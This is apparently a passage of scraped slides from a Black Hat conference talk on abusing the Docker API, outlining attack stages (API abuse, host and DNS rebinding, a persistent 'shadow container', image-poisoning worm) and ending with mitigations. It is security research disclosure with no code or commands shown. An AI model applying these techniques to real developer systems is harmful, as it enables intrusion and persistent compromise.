![Page 78: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/78.jpg)
78
SHADOW CONTAINER – SHUTDOWN SCRIPT
![Page 79: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/79.jpg)
79
SHADOW CONTAINER – MYSCRIPT.SH
![Page 80: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/80.jpg)
80
SHADOW CONTAINER DEMO
![Page 81: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/81.jpg)
FULL ATTACK
CLICK TO PWN!
![Page 82: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/82.jpg)
82
FULL ATTACK DEMO
![Page 83: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/83.jpg)
83
FULL ATTACK DEMO
Abuse Docker API
![Page 84: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/84.jpg)
84
FULL ATTACK DEMO
Abuse Docker API
Host Rebinding
![Page 85: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/85.jpg)
85
FULL ATTACK DEMO
Abuse Docker API
Host Rebinding
![Page 86: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/86.jpg)
86
FULL ATTACK DEMO
Abuse Docker API
Host Rebinding
![Page 87: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/87.jpg)
87
FULL ATTACK DEMO
Abuse Docker API
Host Rebinding
Shadow Container
![Page 88: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/88.jpg)
88
FULL ATTACK DEMO
Abuse Docker API
Host Rebinding
Shadow Container
![Page 89: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/89.jpg)
89
FULL ATTACK DEMO
Abuse Docker API
Host Rebinding
Shadow Container
![Page 90: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/90.jpg)
90
FULL ATTACK DEMO
Abuse Docker API
Host Rebinding
Shadow Container
![Page 91: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/91.jpg)
91
FULL ATTACK DEMO
Abuse Docker API
Host Rebinding
Shadow Container
shadow
![Page 92: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/92.jpg)
92
FULL ATTACK DEMO
Abuse Docker API
Host Rebinding
Shadow Container
shadow
![Page 93: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/93.jpg)
93
FULL ATTACK DEMO
Abuse Docker API
Host Rebinding
Shadow Container
![Page 94: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/94.jpg)
94
FULL ATTACK DEMO
Abuse Docker API
Host Rebinding
Shadow Container
myscript
![Page 95: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/95.jpg)
95
FULL ATTACK DEMO
![Page 96: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/96.jpg)
IMPACT
DEVELOPERS AS TARGETS
![Page 97: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/97.jpg)
97
ADVANCED PERSISTENT THREAT
Persistency
Concealment
Low Forensic Footprint
Access to Internal Enterprise Network
![Page 98: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/98.jpg)
98
SHADOW WORM
Attacker poisons images
Bad image spread like a worm in pipeline
![Page 99: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/99.jpg)
99
ATTACK FLAVORS
MAC
• DNS Rebinding
• Shadow Container
Linux
• DNS Rebinding
• Full Access
Windows Containers
• Abuse API
• Host Rebinding
• Full Access
![Page 100: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/100.jpg)
CONCLUSIONS
![Page 101: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/101.jpg)
101
MITIGATION
Don’t expose container engine API
Only allow authenticated clients (certificates) access to
exposed port (or block it via Firewall)
Analyze Container Engine Logs (on development also)
Disable NetBIOS & LLMNR
Continuously scan images in registries
Continuously monitor containers in runtime
![Page 102: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/102.jpg)
102
BLACK HAT SOUND BYTES
Developers are the new Targets
New Attacks: Host Rebinding & Shadow Container
Protect your PIPE: Scan images & Monitor Containers in
Runtime
Michael Cherny @chernymi Sagie Dulce @SagieSec
http://info.aquasec.com/whitepaper-how-abusing-docker-api-led-to-remote-code-execution